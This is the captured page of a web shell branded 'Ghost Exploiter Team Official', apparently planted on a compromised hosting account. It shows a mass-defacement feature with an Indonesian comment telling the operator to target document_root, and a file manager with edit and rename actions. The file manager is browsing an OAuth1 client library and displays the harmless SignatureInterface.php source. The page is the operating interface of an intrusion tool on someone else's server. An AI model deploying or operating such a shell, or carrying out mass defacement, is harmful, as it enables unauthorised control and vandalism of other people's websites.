webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
league
/
oauth1-client
/
src
/
Signature
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
EncodesUrl.php
3.153KB
edt
ren
HmacSha1Signature.php
0.763KB
edt
ren
PlainTextSignature.php
0.372KB
edt
ren
RsaSha1Signature.php
0.801KB
edt
ren
Signature.php
1.142KB
edt
ren
SignatureInterface.php
1.151KB
edt
ren
<?php namespace League\OAuth1\Client\Signature; use League\OAuth1\Client\Credentials\ClientCredentialsInterface; use League\OAuth1\Client\Credentials\CredentialsInterface; interface SignatureInterface { /** * Create a new signature instance. * * @param ClientCredentialsInterface $clientCredentials */ public function __construct(ClientCredentialsInterface $clientCredentials); /** * Set the credentials used in the signature. These can be temporary * credentials when getting token credentials during the OAuth * authentication process, or token credentials when querying * the API. * * @param CredentialsInterface $credentials * * @return void */ public function setCredentials(CredentialsInterface $credentials); /** * Get the OAuth signature method. * * @return string */ public function method(); /** * Sign the given request for the client. * * @param string $uri * @param array $parameters * @param string $method * * @return string */ public function sign($uri, array $parameters = [], $method = 'POST'); }